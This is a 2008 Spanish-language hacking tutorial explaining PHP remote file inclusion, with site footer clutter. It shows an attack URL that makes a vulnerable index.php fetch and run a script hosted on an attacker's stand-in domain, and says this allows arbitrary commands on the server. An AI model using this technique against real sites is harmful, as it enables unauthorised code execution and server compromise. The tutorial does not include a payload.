|
|
curso online 7 (php file inclusion)
(php file inclusion)
php es un lenguage de programacion web k permite no solo visualizar datos, realizar calculos etc, como los lenguages web clasicos, sino k permite tmb ejecutar comandos en el servidor (comandos shell), modificar archivos, etc �
detalles previos:
1. un servidor para poder servir paginas php debe tener el php instalado i el servidor web configurado para trabajar con el
2. php es un lenguage parecido a c, por lo cual, las consecuencias de en una situacion especial, poder llegar a introducir un archivo php en el contexto del servidor es comparable con poder compilar i ejecutar cualkier codigo en c en el contexto del servidor (esto tecnicamnte no es asi, pero lo asumiremos para k os hagais a la idea)
3. lo k trataremos aki se refiere a sistemas unix, aunke php no tiene ningun problema de incomptabilidades con windows, podria aplicarse a windows con las consecuentes adaptaciones, pero el 99% de servers son unix o derviados (vease linux) asi k trataremos este ultimo.
4. en los sistemas unix/linux (los tratados aki) el php es habitual i en el 99% de los casos se cumple, k el php tenga permisos de nobody, pero en ocasiones tiene permisos del usuario web (el k la cuelga etc..), en la practica nos da igual los permisos k tenga php.
5. php tiene una opcion llamada safemode, si esa opcion se encuentra activada (por defecto: no) el servidor no sera vulnerable.
empezemos�el php tiene una funcion llamada include la cual sirve para pasarle la ejecucion a otro script php, de forma k si tenemos un archivo php llamado a.php i otro llamado b.php podriamos hacer un include en a.php k apunte a b.php i cuando un usuario hiciese:
www.example.com/a.php veria b.php, ia k ha sido incluido.
bien, esto nos lleva a pensar en esas paginas k todos hemos visto alguna vez:
www.example.com/index.php?seccion=descargas
bien, lo k ocurre aki es k index.php recive a traves de la url la variable seccion, luego si la pagina es vulnerable (ahora entendereis por k) index.php cojera descargas i le a�adira al final .php i lo incluira, haciendo asi el include a:
descargas.php
k ocurrira si nos creamos un hosting en almacenweb.com o algun otro servicio de hostings gratuitos i subimos un archivo llamado: hack.php i luego vamos a la pagina vulnerable i hacemos:
www.example.com/index.php?seccion=http://www.paginahacker.com/hack
cojera, le a�adira a la variable seccion al final un .php i hara un include, incluyendo asi:
http://www.paginahacker.com/hack.php
bien, esto nos lleva a pensar k podemos ejecutar cualkier archivo php en el servidor, i es cierto, este agujero es critico.
existen comandos php para modifcar archivos (siempre k tengamos permisos) ejecutar comandos etc�
nota: muchos lammers creidos, ni�atos i gente abusrda i molesta solo conocen esta tecnica i se dedican a decir k son hackers, espero k nadie aprenda esto i solo por poder hackear servidor asi, se kede estancado.
Copyright © por <<< DiMeNcIoNhAcK>>> Derechos Reservados. Publicado el: 2008-07-21 (145 _READS) _GOBACK |
|
![[News Feed]](images/powered/feed_20_news.png "News Feed"){kind=small}
![[Forums Feed]](images/powered/feed_20_forums.png "Forums Feed"){kind=small}
![[Downloads Feed]](images/powered/feed_20_down.png "Downloads Feed"){kind=small}
![[Web Links Feed]](images/powered/feed_20_links.png "Web Links Feed"){kind=small}
![[Validate robots.txt]](images/powered/valid-robots.png "Validate robots.txt"){kind=small}
![.::[Horoscopos]::.](http://i397.photobucket.com/albums/pp51/vanilover/horoscopos.jpg)
Para saber mas de estos programas antes de descargarlos SOlo da Clip 
Invitado(s): 15
